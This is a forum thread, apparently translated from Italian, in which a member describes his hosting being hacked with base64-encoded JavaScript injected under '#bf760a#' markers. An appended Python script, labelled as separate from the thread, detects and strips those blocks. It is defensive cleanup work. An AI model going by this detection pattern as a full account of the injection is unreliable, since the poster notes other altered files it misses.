Ask me!

  • lucrus
    Bodyweb Member
    • May 2013

    Ask me!

    Guys, this is fantastic, a forum like this one that dedicates a space specifically to Unix-like systems!
    It's just a pity that it seems rather deserted...

    So let's do this: when it comes to fitness I'm ignorant, and in fact I signed up to leech your advice, but when it comes to Linux/Unix I'm a professional (meaning, I work professionally in the Linux field and I also teach various courses), so if you have doubts don't be afraid to ask me. Oh, of course, I might not know the answer, that can always happen...
  • Sean
    Csar
    • Sep 2007

    #2
    Let's move this to Super Digital... the Home Unix section is out of use by now.

    • Belch Warrior
      Bodyweb Advanced
      • Feb 2008

      #3
      what do you think of the repeated code injection attacks on Linux Apache servers over the last few days? Solutions? Protections?


      • lucrus
        Bodyweb Member
        • May 2013

        #4
        As far as I know, no spikes of code injection on Apache servers have been reported in the last few days; the last one I knew of was in December 2012. Do you have a link to a blog that talks about it?


        • Belch Warrior
          Bodyweb Advanced
          • Feb 2008

          #5
          they got in on May 25 on my hosting, where I have several domains...

          they added a piece of code to all the index.html files on the HTML sites, index.php on the others, and where there were CMSs they did the most damage: on the WordPress sites they only touched index.php, on the Joomla ones they touched index.php and added a PHP file, while on the PrestaShop ones they made a big mess, touching a great many .php and .js files


          • lucrus
            Bodyweb Member
            • May 2013

            #6
            Rather than an Apache problem, it's more likely that they exploited a flaw in some CMS extension. Depending on how serious the flaw is, they might even have used just one to do the damage to that CMS and, through it, to all the others too.
            How are you doing with security updates? Which distro do you use? Is it possible to browse the web from the server? Do the various CMSs have many extensions? Are they up to date? Do you have root access to the server or only FTP?


            • Belch Warrior
              Bodyweb Advanced
              • Feb 2008

              #7
              it's shared hosting... in the sense that what I see as "root" actually gives access to my domains, but not to the server's real root, and each subdirectory corresponds to a domain...

              in any case, it's not been understood what the flaw is due to, because they touched all the domains, they added JavaScript code encrypted in base64...

              this one here:

              #bf760a#
              #/bf760a#

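A check for the marker-delimited block shown in the last post, as an added example that is not part of the original thread: it scans a web root for files containing a paired `#tag#` ... `#/tag#` block. The six-hex-digit generalization of the tag, the file suffixes and all function names are assumptions, and the sample tree is constructed.

```python
import re
import tempfile
from pathlib import Path

# Paired markers in the shape shown in the post: "#bf760a#" ... "#/bf760a#".
# Assumption: other infected sites may carry a different six-hex-digit tag.
MARKER_BLOCK = re.compile(rb"#([0-9a-f]{6})#.*?#/\1#", re.DOTALL)
# File types the poster reports as modified (HTML, PHP and .js files).
SUFFIXES = {".html", ".htm", ".php", ".js"}


def find_blocks(data: bytes):
    """Return (tag, start, end) for every marker-delimited block in data."""
    return [(m.group(1).decode(), m.start(), m.end())
            for m in MARKER_BLOCK.finditer(data)]


def scan_tree(root):
    """Map each affected file (path relative to root) to the tags found in it."""
    hits = {}
    root = Path(root)
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in SUFFIXES:
            blocks = find_blocks(path.read_bytes())
            if blocks:
                hits[path.relative_to(root).as_posix()] = [b[0] for b in blocks]
    return hits


def strip_blocks(data: bytes) -> bytes:
    """Return data with marker-delimited blocks removed, for review as a diff."""
    return MARKER_BLOCK.sub(b"", data)


def demo():
    # Constructed sample tree; the block body is a harmless placeholder.
    injected = b'#bf760a#\necho "<script>/* placeholder */</script>";\n#/bf760a#\n'
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp) / "example-domain"
        site.mkdir()
        (site / "index.php").write_bytes(b"<?php\n" + injected + b"echo 'home';\n")
        (site / "about.html").write_bytes(b"<p>#ffffff# is white</p>\n")
        (site / "notes.txt").write_bytes(injected)  # suffix not scanned
        return scan_tree(tmp)


if __name__ == "__main__":
    print(demo())
```

A file without markers is not thereby clean: the poster also reports an added PHP file on the Joomla sites, which only a comparison against a known-good copy would reveal.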